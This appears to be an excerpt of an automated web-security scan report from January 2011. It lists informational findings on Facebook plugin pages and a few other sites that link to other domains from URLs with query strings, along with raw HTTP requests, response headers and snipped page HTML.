http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /connect/connect.php?+id=62945690879&connections=10&stream HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

20.572. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?%20id=62945690879&connections=10&stream=

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs575.ash1/173991_699310051_3510639_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/161100_100001287608349_3707867_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

Response

20.573. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light

The response contains the following links to other domains:

http://d.static.ak.fbcdn.net/rsrc.php/yV/r/u2XEW2M3uCu.css
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

20.574. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

Response

20.575. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

Response

20.576. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=111217515558400&width=760&connections=26&stream=true&header=false&height=555

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png
http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173673_645665173_8179808_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1431.snc4/173257_100001950285846_2393096_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1433.snc4/173424_1352486634_4160497_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs338.snc4/41764_636357773_2357_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs442.snc4/48824_1046656972_2377091_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs478.snc4/50111_766910086_2176310_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs714.ash1/161267_674455524_3070011_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs717.ash1/161419_100001522669503_929421_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js

Request

GET /plugins/likebox.php?id=111217515558400&width=760&connections=26&stream=true&header=false&height=555 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:55 GMT
Content-Length: 16200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yo/r/wqv1o-EUF6N.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yf/r/Pp-oQmFcGTc.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/beirutcityguide" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs267.snc3/23271_111217515558400_6673_q.jpg" alt="Beirut.com" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/DuhNahh.CuppCakee.Maharsyy" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1433.snc4/173424_1352486634_4160497_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/marc.hayek" target="_blank"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs456.snc4/49935_655960071_7170357_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=885230253" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173831_885230253_6704458_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=766910086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs478.snc4/50111_766910086_2176310_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs338.snc4/41764_636357773_2357_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=610855543" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=645665173" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173673_645665173_8179808_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001950285846" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1431.snc4/173257_100001950285846_2393096_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001522669503" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs717.ash1/161419_100001522669503_929421_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1046656972" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs442.snc4/48824_1046656972_2377091_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=851905474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/abid.bahloul" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001476439731" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=674455524" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs714.ash1/161267_674455524_3070011_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001903179424" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

20.577. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/profile.php?id=836605415

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css
http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css
http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...

20.578. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/sharer.php?u=

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://e.static.ak.fbcdn.net/rsrc.php/y8/r/-lJYufDodnZ.css
http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/y_/r/1wbaEwMBrY2.css
http://static.ak.fbcdn.net/rsrc.php/yo/r/0kM-ICNiT22.css

Request

GET /sharer.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=vMrhe; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:31 GMT
Content-Length: 10912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y_/r/1wbaEwMBrY2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yo/r/0kM-ICNiT22.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/y8/r/-lJYufDodnZ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...

20.579. http://www.fiction.net/blong/programs/#aub/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fiction.net
Path:	/blong/programs/#aub/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://www.fiction.net/blong/programs/#aub/x26amp;rct\\x3dj\\x26amp;q\\x3daub+assemble+usenet+\\x26amp;usg\\x3dAFQjCNH6sOd0x37wAZZbuOSPjUuRZxyWxA\\x26amp;sa\\x3dX\\x26amp;ei\\x3dkZI9Ta-vH8P68AayusHTCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCEQygQ\\x22\\x3e\\x3cem\\x3eaub\\x3c/em\\x3e

The response contains the following links to other domains:

http://encap.cso.uiuc.edu/
http://encap.cso.uiuc.edu/epkg/
http://hoohoo.ncsa.uiuc.edu/
http://hoohoo.ncsa.uiuc.edu/archie/
http://shire.ncsa.uiuc.edu/
http://terra.igcom.net/~jeske/s3mod.html
http://www.ais.net/dmarks/
http://www.clearsilver.net/
http://www.debian.org/Packages/unstable/text/catdoc.html
http://www.ece.uiuc.edu/~ece291/
http://www.geek-girl.com/bugtraq/1995_3/0217.html
http://www.google-analytics.com/urchin.js
http://www.ice.ru/~vitus/catdoc/index.html
http://www.uiuc.edu/ph/www/jeske
http://www.uiuc.edu/ph/www/roth
http://www.uiuc.edu/ph/www/swetland

Request

GET /blong/programs/#aub/x26amp;rct\\x3dj\\x26amp;q\\x3daub+assemble+usenet+\\x26amp;usg\\x3dAFQjCNH6sOd0x37wAZZbuOSPjUuRZxyWxA\\x26amp;sa\\x3dX\\x26amp;ei\\x3dkZI9Ta-vH8P68AayusHTCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCEQygQ\\x22\\x3e\\x3cem\\x3eaub\\x3c/em\\x3e HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:14 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14165

<HTML>
<HEAD>
<TITLE>Brandon's Program Archive</TITLE>
</HEAD>
<BODY BGCOLOR=#ffffff>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javas
...[SNIP]...
<br>
     <a class=hlink href="http://www.clearsilver.net/">ClearSilver</a>
...[SNIP]...
<LI><a href="http://www.clearsilver.net/">ClearSilver</a>
...[SNIP]...
</A>
Written by <a href="http://www.uiuc.edu/ph/www/swetland">Brian Swetland</A>,
this is a C program to create the link tree for a new program in an encap
distribution. For more information, see <a href="http://www.uiuc.edu/ph/www/roth">Mark Roth's</a> encap package manager,
<a href="http://encap.cso.uiuc.edu/epkg/">epkg</a>, and a whole lot of
information on it <a href="http://encap.cso.uiuc.edu/">here</a>
...[SNIP]...
</A>
Another program originally written by
<a href="http://www.uiuc.edu/ph/www/swetland">Brian Swetland</A>
...[SNIP]...
es to allow header editing, etc.
Webgrab is a command line browser, and is quite useful for testing servers
and writing scripts to snarf web content. The current version of webgrab is
also part of the <a href="http://hoohoo.ncsa.uiuc.edu/">NCSA HTTPd 1.5.x</a>
...[SNIP]...
</A>
This program was initially written by
<a href="http://shire.ncsa.uiuc.edu/">Scott Powers</a>
...[SNIP]...
rl script which I wrote to replace a shell script version. It
interfaces with the Un*x C-Archie command-line archie query program, and
creates a hyper-linked response in HTML. It can be seen in action
<a href="http://hoohoo.ncsa.uiuc.edu/archie/">here</a>
...[SNIP]...
</A>
This was a program that originated as an x86 assembly project for
<a href="http://www.ece.uiuc.edu/~ece291/">ECE 291</a> by my roommates
<a href="http://www.uiuc.edu/ph/www/jeske">David Jeske</a> and
<a href="http://www.ais.net/dmarks/">Dan Marks</a>
...[SNIP]...
A for the course. I decided to port it to Linux on a whim, and
they took over from there. Since then, I've helped with various issues,
including the reorganization of the most recent versions. See the
<a href="http://terra.igcom.net/~jeske/s3mod.html">S3Mod Home Page</a>
...[SNIP]...
</A> -
<A href="http://www.geek-girl.com/bugtraq/1995_3/0217.html">Original</A>
...[SNIP]...
</A>
Yes, this is for MS Word .doc files. Someone pointed out a
<a
href="http://www.debian.org/Packages/unstable/text/catdoc.html">debian
package</a>
...[SNIP]...
e or paragraph of
pure text. The author has rewritten this from scratch, and the new
version can handle more Word files and also includes an Excel data
extractor. The homepage for this tool is located <a
href="http://www.ice.ru/~vitus/catdoc/index.html">here</a>
...[SNIP]...

20.580. http://www.filewatcher.com/_/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/_/

Issue detail

The page was loaded from a URL containing a query string:

http://www.filewatcher.com/_/?p=2&pd=1&pt=2&q=aub%5B-_.%5D*

The response contains the following links to other domains:

http://www.ftp-sites.org/
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.maruhn.com/

Request

GET /_/?p=2&pd=1&pt=2&q=aub%5B-_.%5D* HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:06 GMT
